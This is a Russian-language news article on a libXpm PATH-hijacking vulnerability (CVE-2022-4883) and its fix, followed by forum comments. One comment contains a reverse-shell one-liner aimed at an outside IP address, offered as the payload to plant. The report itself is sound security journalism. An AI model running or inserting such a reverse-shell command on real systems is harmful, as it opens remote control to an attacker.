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Уязвимость в libXpm, приводящая к выполнению кода

21.01.2023 10:41

Опубликован корректирующий выпуск библиотеки libXpm 3.5.15, развиваемой проектом X.Org и применяемой для обработки файлов в формате XPM. В новой версии устранены три уязвимости, две из которых (CVE-2022-46285, CVE-2022-44617) приводят к зацикливанию при обработке специально оформленных файлов XPM. Третья уязвимость (CVE-2022-4883) позволяет запустить произвольные команды при выполнении приложений, использующих libXpm. При запуске связанных с libXpm привилегированных процессов, например, программ с флагом suid root, уязвимость даёт возможность поднять свои привилегии.

Уязвимость вызвана особенностью работы libXpm со сжатыми файлами XPM - при обработке файлов XPM.Z или XPM.gz библиотека при помощи вызова execlp() запускает внешние утилиты распаковки (uncompress или gunzip), путь к которым вычисляется на основе переменной окружения PATH. Атака сводится к размещению в доступном пользователю каталоге, присутствующем в списке PATH, собственных исполняемых файлов uncompress или gunzip, которые будут выполнены в случае запуска приложения, использующего libXpm.

Уязвимость устранена заменой вызова execlp на execl с использованием абсолютных путей к утилитам. Дополнительно добавлена сборочная опция "--disable-open-zfile" позволяющая отключить обработку сжатых файлов и вызов внешних утилит для распаковки.

  1. Главная ссылка к новости (https://www.mail-archive.com/x...)
  2. OpenNews: Возможность выполнения кода злоумышленника при открытии XPM файлов в библиотеке imlib2
  3. OpenNews: Уязвимости в X.Org Server и libX11
  4. OpenNews: Обновление X.Org Server 21.1.5 и xwayland 22.1.6 с устранением 6 уязвимостей
  5. OpenNews: Уязвимости в X.Org Server
  6. OpenNews: Обновление X.Org Server 21.1.4 с устранением уязвимостей
Лицензия: CC-BY
Тип: Проблемы безопасности
Короткая ссылка: https://opennet.ru/58524-libxpm
Ключевые слова: libxpm
При перепечатке указание ссылки на opennet.ru обязательно


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  • 1.1, Аноним (1), 11:12, 21/01/2023 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    > При запуске связанных с libXpm привилегированных процессов, например, программ с флагом suid root, уязвимость даёт возможность поднять свои привилегии.

    Это кто такой умный ставит левым прогам суид-рут?!

     
     
  • 2.4, Аноним (4), 12:07, 21/01/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    Libxpm классика, которая может всплыть где угодно, раньше вроде в x-сервере использовалась.
     
     
  • 3.18, Аноним (1), 14:12, 21/01/2023 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    И много у тебя троянов внутри суидных прог?
     
  • 2.49, dannyD (?), 18:19, 21/01/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    >>Это кто такой умный ставит левым прогам суид-рут?!

    а спроси.

    ни кто не заметил, что даже если дать
    ~/.local/share/TelegramDesktop/log.txt root ro, то всё равно он переписывается ?

    т.е. при запуске юзверькой прилоги переписываеся файл с доступом только рута.

    вот меня это как-то напрягает.

     
     
  • 3.55, Аноним (1), 19:57, 21/01/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    Потому что ты ничего не понимаешь. Права на каталог TelegramDesktop - чьи? Вот чьи права - тот и может удалять-добавлять файлы в этом каталоге. Что такое "переписать"? Старый файл - удаляется, новый - создаётся, обе операции зависят от прав на _каталог_.

    Тебе нужен "закрепляющий бит": каталог с установленным sticky-битом означает, что удалить файл из этого каталога может только владелец файла или root. Не забывай, если выше ещё есть каталоги.

     

  • 1.2, Аноним (1), 11:13, 21/01/2023 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +3 +/
    > Атака сводится к размещению в доступном пользователю каталоге, присутствующем в списке PATH, собственных исполняемых файлов

    Ну а это вообще жесть :)

     
     
  • 2.3, Аноним (3), 12:01, 21/01/2023 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    По сути, не отличается от подмены утилиты или библиотеки на левую. Вы обречены.
     
     
  • 3.19, Аноним (1), 14:14, 21/01/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    > не отличается от подмены утилиты или библиотеки на левую

    Вот с этого и надо было статью начинать: "сначала надо подменить систему".

     
  • 2.11, An onymous (?), 12:43, 21/01/2023 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    warning! Пользователь может запустить под собой какую-то программу!
     
     
  • 3.40, Аноним (40), 16:34, 21/01/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    Warning. Программа с suid бит может запустить под root какую-то программу вместо gzip
     
     
  • 4.47, Admino (ok), 18:00, 21/01/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    А что за программа-то?
     
     
  • 5.51, OpenEcho (?), 18:36, 21/01/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    > А что за программа-то?

        bash -i >& /dev/udp/1.2.3.4/1337 0>&1

     
     
  • 6.54, Admino (ok), 19:38, 21/01/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    С правами рута и с использованием libXpm?

    Отсыпь.

     

  • 1.5, Аноним (5), 12:11, 21/01/2023 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –5 +/
    Ядро - одна большая чёрная дырка. Остальные проги тоже, даже sudo который со времён мамонтов, дырявый до сих пор. ОпенБСД занесли за бэкдоры и дырки, тоже не секрет и очень давно уже.

    Ну т.е., вся наша вера в жопарукий-сорс - тлен.. Успокаивает порой лишь что wine хоть работает, и то слава богу, ну хоть одна хорошая новость. Как жить то теперь?

     
     
  • 2.6, Аноним (6), 12:22, 21/01/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    Без таких нытиков как ты - нормально жить
     
  • 2.9, деанон (?), 12:39, 21/01/2023 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    Зуммер узнал, что мир не идеален
     
     
  • 3.12, Аноним (5), 12:50, 21/01/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    Да откудаж вы рождаетесь то инородные такие, что аж каждый вдох и выдох это уже полноценный вывод.
    Кто-то прав, вас уже многова-то..
     
  • 2.10, Аноним (10), 12:41, 21/01/2023 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    Хорошо жить на Винде 11
     
     
  • 3.13, Анатолий Цыбин (ok), 12:52, 21/01/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    Естественно, ведь на Винде нет дыр. Весь мир знает, что Майкрософт -- это фирма от самого бога, в которой работают трудолюбивейшие как Стаханов и умнейшие как Эйнштейн специалисты. Они любят пользователя и заботятся о нём, поэтому не допущают никаких дыр, никаких уязвимостей в принципе.
    Те, кто попадают в рай, являются свидетелями того, что у самого бога стоит Винда.
    А кто попадает в ад... Ну, не будем о плохом. =)
     
     
  • 4.35, Аноним (35), 15:14, 21/01/2023 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Ну не просто же так в линуксе демоны
     
     
  • 5.46, Admino (ok), 17:59, 21/01/2023 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    И зомби.

    И в винде иконки и службы.

     
  • 2.15, Аноним (15), 13:12, 21/01/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    А в стенах камеры ещё.
     

  • 1.14, Ананоним (?), 13:08, 21/01/2023 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Ну они скоро подарят всяким докерам фичу невозможности пользователю менять переменную PATH. Скажите переменным окружения прощай! Депрекатед!
     
     
  • 2.20, Аноним (1), 14:17, 21/01/2023 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    Да пусть меняет PATH, сколько влезет. Вопрос в другом: какого фига разрешено недоверенному юзеру запускать что-то оттуда, куда он имеет права на запись? Админ локалхоста забыл про noexec?
     
     
  • 3.33, Омномним (?), 15:07, 21/01/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    Да не, ну это херня, у меня другой вопрос: каким образом этот юзер себе suid root-то организует?
    А так - ну запускает непривилигерованный юзер что-то, в чём проблема-то? :)
     
     
  • 4.41, GOrilla (?), 16:42, 21/01/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    Как это в чем? А эксплоит запускает тогда что. Шелл хостинги не дают запускать из хоумов.
     

  • 1.16, InuYasha (??), 13:25, 21/01/2023 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    > при помощи вызова execlp() запускает внешние утилиты

    Ну это вообще... смузикод из 80ых что-ли? system("gzip my shit"); А всё потому что нет нормального LinAPI?

    Если кто будет возмущаться, я тоже делал exec для всяких костылей, и знаю, что иногда надо, но это грязный хак, и не в проде же )

     
     
  • 2.21, Аноним (21), 14:19, 21/01/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    > А всё потому что нет нормального LinAPI?

    А как ты себе это представляешь в принципе? Абсолютно все утилиты на компе должны идти с lib<util_name>.so и каждая утилита должна линковаться с каждой библиотекой другой утилиты?

     
     
  • 3.27, Аноним (40), 14:52, 21/01/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    В Винде можно dll связать с другой dll.
    В java можно динамически загружать нативные библиотеки.
    Почему в libxpm нельзя как то так?

    Или просто скопипастить код распаковки в исходный код lixpm и не запускать неизвестно какие исполняемые файлы

     
     
  • 4.53, Аноним (21), 19:14, 21/01/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    > В java можно динамически загружать нативные библиотеки.

    Офигеть, вот это круто! Это dlopen() что-ли?

     
  • 3.29, InuYasha (??), 14:55, 21/01/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    В идеальном мире - примерно да. Функции, алгоритмы, код - в ДЛЛках, CLI и фронтенд - на чём хочешь. А если вспомнить rundll32, то, с натяжкой, КЛИ у нас уже готов... )
    Конкретно по сабжу - я реально удивлён что там не подключили какую-нибудь библиотеку.
     
  • 3.45, Аноним (45), 17:13, 21/01/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    В данном случае распаковка не является задачей libXpm. Программа может напрямую вызвать zlib, и разжатые данные передать libXpm
     

  • 1.17, InuYasha (??), 13:30, 21/01/2023 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –1 +/
    Гос.пади, xpm - это битмапы в формате сишного массива что-ли? JSON и смузихлёбство из прошлого века? Всю жизнь его ненавидел. Зато проприетарасты его обожают.
     
     
  • 2.22, Аноним (21), 14:20, 21/01/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    И я его обожаю. В CDE божественные xpm'ные иконки
     
  • 2.23, Аноним (1), 14:24, 21/01/2023 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Дело не в xpm, а что тебе кто-то может ls, например, подменить, а ты потом sudo ls сделаешь (это так, для наглядности, про что "уязвимость").
     
     
  • 3.26, InuYasha (??), 14:51, 21/01/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    Да это-то понятно. Просто вспомнил, что xpm такое. Пока у тебя диск завален xpm-ками - это всё смешно, а, вот, когда у тебя бинарники со вSHITыми в виде данных (а не, хотя бы, ресурсов) картинками - вообще грусть. Особенно если это прошивки какие-нибудь.
     

  • 1.24, Аноним (40), 14:42, 21/01/2023 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    >Уязвимость вызвана особенностью работы libXpm со сжатыми файлами XPM - при обработке файлов XPM.Z или XPM.gz библиотека при помощи вызова execlp() запускает внешние утилиты распаковки (uncompress или gunzip)

    Очень хорошая архитектура, настоящие программисты на си, превзошли сами себя

     
     
  • 2.32, Аноним (40), 15:07, 21/01/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    Хотя я тоже писала код запускающий внешний исполняемый файл для ковертации, который в прод работает.
    Но там ни путь ни параметры от пользователя не приходят.
     
  • 2.48, Аноним (21), 18:05, 21/01/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    > Очень хорошая архитектура, настоящие программисты на си, превзошли сами себя

    А что не так? У вас там в расте особенности работы с памятью, а у нас особенность работы с libXpm

     

  • 1.25, Аноним (25), 14:44, 21/01/2023 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +2 +/
    >запускает внешние утилиты распаковки (uncompress или gunzip)

    Вон из профессии за такое решение.

    >Уязвимость устранена заменой вызова execlp на execl с использованием абсолютных путей к утилитам

    Вон из профессии за такой фикс.

     
     
  • 2.36, Аноним (36), 15:28, 21/01/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    А если бы они использовали другой язык проблем было бы ещё больше. В том числе с программистами и их решениями.
     
     
  • 3.39, Аноним (39), 16:27, 21/01/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    Какой нахрен другой язык, им дали zlib - нет "хочу дёргать exec". Необучаемые.
     

  • 1.30, Омномним (?), 15:03, 21/01/2023 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +2 +/
    при обработке файлов XPM.Z или XPM.gz библиотека при помощи вызова execlp() запускает внешние утилиты распаковки

    А libz поюзать вообще не судьба была?

     
     
  • 2.34, Аноним (34), 15:11, 21/01/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    Ну, тогда бы сейчас бы читали новость об очередном переполнении int и выходы за пределы буфера.
     
     
  • 3.37, Аноним (36), 15:29, 21/01/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    Выходить? Не надо так.
     

  • 1.38, Анонн (?), 16:15, 21/01/2023 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    Офигенный код и офигенный фикс...
    Кто там пыхеров и жсников за eval ругал? Ваш выход!
     
     
  • 2.44, Аноним (44), 17:12, 21/01/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    В это проблема GNU/Xorg библиотек. Десятки тысяч исходных кодов, которые не верифицировались и не обновлялись на протяжении, например 11 лет! 20 лет! да там есть и такое.
     

  • 1.43, Аноним (44), 17:09, 21/01/2023 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    А ведь можно было использовать библиотеки реализующие декомпрессию z/gz и не вызывать в коде библиотеки (библиотеки!!) внешние исполняемые файлы.
     
     
  • 2.50, Аноним (21), 18:29, 21/01/2023 [^] [^^] [^^^] [ответить]  
    		• +/
    да, это ужас какой-то, летящий на крыльях ночи. Скорее всего растаман писал. Да, тогда раста еще не было, но склад ума и подход к решению проблем у будущих растаманов уже был. Хорошо, что автор этого кода уже давно ушёл на раст (к-й позволяет безопасно работать с памятью) и больше такой ужас не напишет.
     

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